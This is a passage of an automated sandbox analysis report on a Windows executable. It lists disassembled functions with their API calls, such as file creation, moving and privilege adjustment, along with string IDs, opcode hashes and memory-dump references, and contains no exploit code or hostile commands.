                                                 • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AdjustPointer$_abort
                                                • String ID:
                                                • API String ID: 2252061734-0
                                                • Opcode ID: 2e0be1dec33ff608cb892fbf3c052c6405e067dc6ab54140891e779ec80bd6d8
                                                • Instruction ID: 6472d8bc64a6049b416d498f1caee907224cb39e9d39f8dbb731ed19a104168a
                                                • Opcode Fuzzy Hash: 2e0be1dec33ff608cb892fbf3c052c6405e067dc6ab54140891e779ec80bd6d8
                                                • Instruction Fuzzy Hash: 2251D272A012269FEB299F50E841BBAB7E4FF44720F1445ADE84D57291E731EC84C790
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B0F3C5
                                                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,00000050,00B0B749,?,?,?,?,?,?), ref: 00B0F450
                                                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?), ref: 00B0F4A7
                                                • SetFileTime.KERNEL32(?,?,?,?), ref: 00B0F569
                                                • CloseHandle.KERNEL32(?), ref: 00B0F570
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                 • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: File$Create$CloseH_prolog3_HandleTime
                                                • String ID:
                                                • API String ID: 4002707884-0
                                                • Opcode ID: f241af44706e085b7a142dfc679ce486116a817df7175632910d5cef916baaa0
                                                • Instruction ID: 208df592811154e8a7083b010319520a5fd62a7dd729dcded4c30ffc09a61136
                                                • Opcode Fuzzy Hash: f241af44706e085b7a142dfc679ce486116a817df7175632910d5cef916baaa0
                                                • Instruction Fuzzy Hash: 8E518B70A0424AAADF25DFE8D885BEEBBF5AF48310F240169F451F72C0DB349A45CB24
                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32 ref: 00B32BE9
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B32C0C
                                                  • Part of subcall function 00B3040E: RtlAllocateHeap.NTDLL(00000000,00B2535E,?,?,00B26C16,?,?,?,?,?,00B25269,00B2535E,?,?,?,?), ref: 00B30440
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00B32C32
                                                • _free.LIBCMT ref: 00B32C45
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B32C54
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                 • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                • String ID:
                                                • API String ID: 336800556-0
                                                • Opcode ID: 84066289c09fa5a8399346be6c88e420981185bac3e3af8b69b7cd133a457265
                                                • Instruction ID: 55b2e243202cbf32a318b701680e27f1b1170cb574b6a973ef569d5f3a523148
                                                • Opcode Fuzzy Hash: 84066289c09fa5a8399346be6c88e420981185bac3e3af8b69b7cd133a457265
                                                • Instruction Fuzzy Hash: 2E01D4736016107F3B262BA65C88D7F7EADDEC6B61B3501A8B904E3111DE608C01A2B0
                                                APIs
                                                • GetLastError.KERNEL32(00B2535E,00B2535E,?,00B301D8,00B30451,?,?,00B26C16,?,?,?,?,?,00B25269,00B2535E,?), ref: 00B3008E
                                                • _free.LIBCMT ref: 00B300C3
                                                • _free.LIBCMT ref: 00B300EA
                                                • SetLastError.KERNEL32(00000000,?,00B2535E), ref: 00B300F7
                                                • SetLastError.KERNEL32(00000000,?,00B2535E), ref: 00B30100
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                 • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ErrorLast$_free
                                                • String ID:
                                                • API String ID: 3170660625-0
                                                • Opcode ID: 735abc96da2bf80246df1ac4f3e318ca26b19fb699601a6a9e2a87c0e6b9bfce
                                                • Instruction ID: 5b13296f83cbceb961c11121a4222a60edfa2af732c189554eda11e835953b48
                                                • Opcode Fuzzy Hash: 735abc96da2bf80246df1ac4f3e318ca26b19fb699601a6a9e2a87c0e6b9bfce
                                                • Instruction Fuzzy Hash: 8A01F4361A560567832A77786DE6F2F36EEDFC1771F3201A4F505A3192EF708C055224
                                                APIs
                                                • _free.LIBCMT ref: 00B334C7
                                                  • Part of subcall function 00B303D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00B33546,?,00000000,?,00000000,?,00B3356D,?,00000007,?,?,00B3396A,?), ref: 00B303EA
                                                  • Part of subcall function 00B303D4: GetLastError.KERNEL32(?,?,00B33546,?,00000000,?,00000000,?,00B3356D,?,00000007,?,?,00B3396A,?,?), ref: 00B303FC
                                                • _free.LIBCMT ref: 00B334D9
                                                • _free.LIBCMT ref: 00B334EB
                                                • _free.LIBCMT ref: 00B334FD
                                                • _free.LIBCMT ref: 00B3350F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                 • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: d91ebe30a7dca080aa04bd4c6721f2b529577584a7f743204536dda8305d3326
                                                • Instruction ID: ee4f61616daebd0dc58725263f379daa883e363dc215b7fca76e38977bfbf4c2
                                                • Opcode Fuzzy Hash: d91ebe30a7dca080aa04bd4c6721f2b529577584a7f743204536dda8305d3326
                                                • Instruction Fuzzy Hash: DBF0FF32514200A78B20EB58F496C17B7D9FE55B10B7A0885F408E7A01CB71FE848764
                                                APIs
                                                • _free.LIBCMT ref: 00B2F7DE
                                                  • Part of subcall function 00B303D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00B33546,?,00000000,?,00000000,?,00B3356D,?,00000007,?,?,00B3396A,?), ref: 00B303EA
                                                  • Part of subcall function 00B303D4: GetLastError.KERNEL32(?,?,00B33546,?,00000000,?,00000000,?,00B3356D,?,00000007,?,?,00B3396A,?,?), ref: 00B303FC
                                                • _free.LIBCMT ref: 00B2F7F0
                                                • _free.LIBCMT ref: 00B2F803
                                                • _free.LIBCMT ref: 00B2F814
                                                • _free.LIBCMT ref: 00B2F825
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                 • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 77fda6fdbdbed64cb71a722a488ccaee5c7f5c2c7c6bc81bb7c0a12156337d2f
                                                • Instruction ID: 39fd8b163333d7a4ff8123e23fd1699ad80354d76cc86cfea6afd746b643f171
                                                • Opcode Fuzzy Hash: 77fda6fdbdbed64cb71a722a488ccaee5c7f5c2c7c6bc81bb7c0a12156337d2f
                                                • Instruction Fuzzy Hash: 45F05E748203208B9711BF28BC52509BBE1FB1D727B5102DAF419A3671CF711D06CF89
                                                APIs
                                                • _wcslen.LIBCMT ref: 00B231A4
                                                  • Part of subcall function 00B014A7: _wcslen.LIBCMT ref: 00B014B8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                 • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: _wcslen
                                                • String ID: .lnk$0$lnk
                                                • API String ID: 176396367-906397761
                                                • Opcode ID: 33a1480046aadef67dcff6abe5cd4d135a0ecdca7d24a69fd4f920b9d6207e29
                                                • Instruction ID: 1b1912eb413be44133ece91ea0d878230722f8d6ca1f7d645845777b4de30d78
                                                • Opcode Fuzzy Hash: 33a1480046aadef67dcff6abe5cd4d135a0ecdca7d24a69fd4f920b9d6207e29
                                                • Instruction Fuzzy Hash: A0E1E871D012689EDB24DBA4D885BDDB7F8AF08300F5045EAE549A7291DB74AB88CF60
                                                APIs
                                                • GetTempPathW.KERNEL32(00000105,00000000,00000000,0000020A), ref: 00B22B66
                                                  • Part of subcall function 00B014A7: _wcslen.LIBCMT ref: 00B014B8
                                                  • Part of subcall function 00B10BF3: _wcslen.LIBCMT ref: 00B10C03
                                                • EndDialog.USER32(?,00000001), ref: 00B22EDA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                 • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: _wcslen$DialogPathTemp
                                                • String ID: $@set:user
                                                • API String ID: 2172748170-1503366402
                                                • Opcode ID: 14cbd9d2bdd75a5d086a8f5781a64f5e2f9019a885ce22fea0ebb2e5b9d32531
                                                • Instruction ID: e5b634b8996c55f2c29195840caaade801c3df3692255512fca5ff47114b2ec8
                                                • Opcode Fuzzy Hash: 14cbd9d2bdd75a5d086a8f5781a64f5e2f9019a885ce22fea0ebb2e5b9d32531
                                                • Instruction Fuzzy Hash: D6C13A30901269AEDF24EBA4DC45BEDBBF8AF15300F5405EAE449B3292DB705B89CF51
                                                APIs
                                                  • Part of subcall function 00B11309: __EH_prolog3.LIBCMT ref: 00B11310
                                                  • Part of subcall function 00B11309: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,00B117FB,?,?,\\?\,5EA84158,?,?,?,00000000,00B3A279,000000FF), ref: 00B11319
                                                  • Part of subcall function 00B11AD1: __EH_prolog3_GS.LIBCMT ref: 00B11AD8
                                                  • Part of subcall function 00B0F763: __EH_prolog3_GS.LIBCMT ref: 00B0F76A
                                                  • Part of subcall function 00B0F58B: __EH_prolog3_GS.LIBCMT ref: 00B0F592
                                                  • Part of subcall function 00B0F58B: SetFileAttributesW.KERNELBASE(?,?,00000024,00B0A724,?,?,?,00000011,?,?,00000000,?,?,?,?,?), ref: 00B0F5A8
                                                  • Part of subcall function 00B0F58B: SetFileAttributesW.KERNEL32(?,?,?,?,?,00B0D303,?,?,?,?,?,?,?,5EA84158,00000049), ref: 00B0F5EB
                                                • SHFileOperationW.SHELL32(?,00000000,?,?,?,00000000), ref: 00B22137
                                                • MoveFileW.KERNEL32(?,?), ref: 00B222BE
                                                • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 00B222D8
                                                  • Part of subcall function 00B114CC: __EH_prolog3_GS.LIBCMT ref: 00B114D3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                 • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: File$H_prolog3_$AttributesMove$CurrentDirectoryH_prolog3Operation
                                                • String ID: .tmp
                                                • API String ID: 1688541384-2986845003
                                                • Opcode ID: 8b134ffab0a501935c5600a7bfb384d1e7c782051194f8d956299151ba5421a0
                                                • Instruction ID: 016b4c6730e30ed8488b5a693c2078b24f72bc01e7f8a0c09804a87aab5a2aa6
                                                • Opcode Fuzzy Hash: 8b134ffab0a501935c5600a7bfb384d1e7c782051194f8d956299151ba5421a0
                                                • Instruction Fuzzy Hash: FBC1D1719002689ADB25DFA4DC85BDDBBB8BF18300F5045EAE54DB3291DB345B89CF21
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B0A307
                                                • GetLastError.KERNEL32(00000054,?,?,?,?,?,00B0D303,?,?,?,?,?,?,?,5EA84158,00000049), ref: 00B0A427
                                                  • Part of subcall function 00B0AC11: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B0AC2E
                                                  • Part of subcall function 00B0AC11: GetLastError.KERNEL32 ref: 00B0AC72
                                                  • Part of subcall function 00B0AC11: CloseHandle.KERNEL32(?), ref: 00B0AC81
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                 • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ErrorLast$CloseCurrentH_prolog3_HandleProcess
                                                • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                • API String ID: 2235100918-639343689
                                                • Opcode ID: 8fcc4c557bc5dd2c06da2dfd2e6f72f2c838bc7cd10795895afed890b0d51dac
                                                • Instruction ID: fb45e272aed10fb46d916160955fae017af403da48d14a32fd750d9843d44ab3
                                                • Opcode Fuzzy Hash: 8fcc4c557bc5dd2c06da2dfd2e6f72f2c838bc7cd10795895afed890b0d51dac
                                                • Instruction Fuzzy Hash: 2C417075E00308AFDF24DBA8E886BEDBBF8EB48314F04449AF501B7391DB7499448B25
                                                APIs
                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\ngPebbPhbp.exe,00000104), ref: 00B2EE6A
                                                • _free.LIBCMT ref: 00B2EF35
                                                • _free.LIBCMT ref: 00B2EF3F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: _free$FileModuleName
                                                • String ID: C:\Users\user\Desktop\ngPebbPhbp.exe
                                                • API String ID: 2506810119-376171749
                                                • Opcode ID: a4b75a7660f85a8df7e7c06483da7154ae9eb6814841de682f47a0760be6fa11
                                                • Instruction ID: c2be0f98bcb5d409d553558efb44c530e0c2bdd159431873e467bc3044469456
                                                • Opcode Fuzzy Hash: a4b75a7660f85a8df7e7c06483da7154ae9eb6814841de682f47a0760be6fa11
                                                • Instruction Fuzzy Hash: 56316371A04268AFDB21EF9AED8199EBBFCEF89310F1440E6F81897211D7709E44CB51
                                                APIs
                                                • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00B29E7B
                                                • _abort.LIBCMT ref: 00B29F86
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: EncodePointer_abort
                                                • String ID: MOC$RCC
                                                • API String ID: 948111806-2084237596
                                                • Opcode ID: 8c20f49deadc697d7651f93a8e83b3e885f5340b4b863a9b0a92da2173c0c462
                                                • Instruction ID: df58cea8b4e6241dde41e73c4934c7eabbe71980b056af4215817917e064c337
                                                • Opcode Fuzzy Hash: 8c20f49deadc697d7651f93a8e83b3e885f5340b4b863a9b0a92da2173c0c462
                                                • Instruction Fuzzy Hash: 77415571900219AFCF15DF98ED81AAEBBB5FF48304F1981A9FA1CA7221D335A950DB50
                                                APIs
                                                • __fprintf_l.LIBCMT ref: 00B1340E
                                                • _strncpy.LIBCMT ref: 00B13459
                                                  • Part of subcall function 00B189ED: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000050,?,00000000,00000000,00B4E088,?,00000007,00B133E2,?,?,00000050,5EA84158), ref: 00B18A0A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                • String ID: $%s$@%s
                                                • API String ID: 562999700-834177443
                                                • Opcode ID: 3dd6f79113dfb0909a4205a925fe36e5f29a26e0ca4776d0b746f84c523d34ba
                                                • Instruction ID: 0446b9d17dbaab48c48fbd8148504adba63e640bff7959ba9c6092f8006eb8a8
                                                • Opcode Fuzzy Hash: 3dd6f79113dfb0909a4205a925fe36e5f29a26e0ca4776d0b746f84c523d34ba
                                                • Instruction Fuzzy Hash: B8218F72500709ABDB10DEA8DC81EEE7BE8FB04700F5405A5FA14D7291EB31EA958B60
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B1F8F7
                                                  • Part of subcall function 00B01E44: GetDlgItem.USER32(00000000,00003021), ref: 00B01E88
                                                  • Part of subcall function 00B01E44: SetWindowTextW.USER32(00000000,00B3C6C8), ref: 00B01E9E
                                                • EndDialog.USER32(?,00000001), ref: 00B1F99F
                                                • SetDlgItemTextW.USER32(?,00000066,00000000), ref: 00B1F9E1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: ItemText$DialogH_prolog3_Window
                                                • String ID: ASKNEXTVOL
                                                • API String ID: 2321058237-3402441367
                                                • Opcode ID: 1bc9363c6d7ac3fec6018aebbe0604440630b959bb7eaf270f188ca8e3188263
                                                • Instruction ID: 1ca21c600590edcff1668905a79620d6aa14d0b41f3e0f10be132285f8ce61a7
                                                • Opcode Fuzzy Hash: 1bc9363c6d7ac3fec6018aebbe0604440630b959bb7eaf270f188ca8e3188263
                                                • Instruction Fuzzy Hash: 06214A31641205BFDB24EBA8CC5AFED37E8EB0A341F5004A5F541AB2A5C631DA44CB21
                                                APIs
                                                • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00B0FEBD,00000008,00000004,00B12D42,?,?,?,?,00000000,00B1ABB6,?), ref: 00B17484
                                                • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00B0FEBD,00000008,00000004,00B12D42,?,?,?,?,00000000), ref: 00B1748E
                                                • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00B0FEBD,00000008,00000004,00B12D42,?,?,?,?,00000000), ref: 00B1749E
                                                Strings
                                                • Thread pool initialization failed., xrefs: 00B174B6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                • String ID: Thread pool initialization failed.
                                                • API String ID: 3340455307-2182114853
                                                • Opcode ID: 2063c73185f7624ab86a5edbea09e690fb9e4fee5112b979e1e0736ad0b2afde
                                                • Instruction ID: 3e303faf327b47be52a474a2df60da1e4aa4d2e54d62947556fa53a4d9e35d91
                                                • Opcode Fuzzy Hash: 2063c73185f7624ab86a5edbea09e690fb9e4fee5112b979e1e0736ad0b2afde
                                                • Instruction Fuzzy Hash: 631191B1644709ABD3219F669CC49E7FFECEB54744F60086EF1DAC3300DAB059808B60
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RENAMEDLG$REPLACEFILEDLG
                                                • API String ID: 0-56093855
                                                • Opcode ID: e39979c1648c6324f261c944a5115c0b5927773a852ad4507359010a30bdec23
                                                • Instruction ID: 0856ae6b34eb1744d00ab268d26c3e1ce52028fa2586dd202addddb99fa0d693
                                                • Opcode Fuzzy Hash: e39979c1648c6324f261c944a5115c0b5927773a852ad4507359010a30bdec23
                                                • Instruction Fuzzy Hash: 0A11AC31304320ABD7218F18FC84A173BE9F749783B0408A9FA4AC3660CB719894DB61
                                                APIs
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00B2A843,00000000,?,00B56150,?,?,?,00B2A9E6,00000004,InitializeCriticalSectionEx,00B3F7F4,InitializeCriticalSectionEx), ref: 00B2A89F
                                                • GetLastError.KERNEL32(?,00B2A843,00000000,?,00B56150,?,?,?,00B2A9E6,00000004,InitializeCriticalSectionEx,00B3F7F4,InitializeCriticalSectionEx,00000000,?,00B2A79D), ref: 00B2A8A9
                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00B2A8D1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
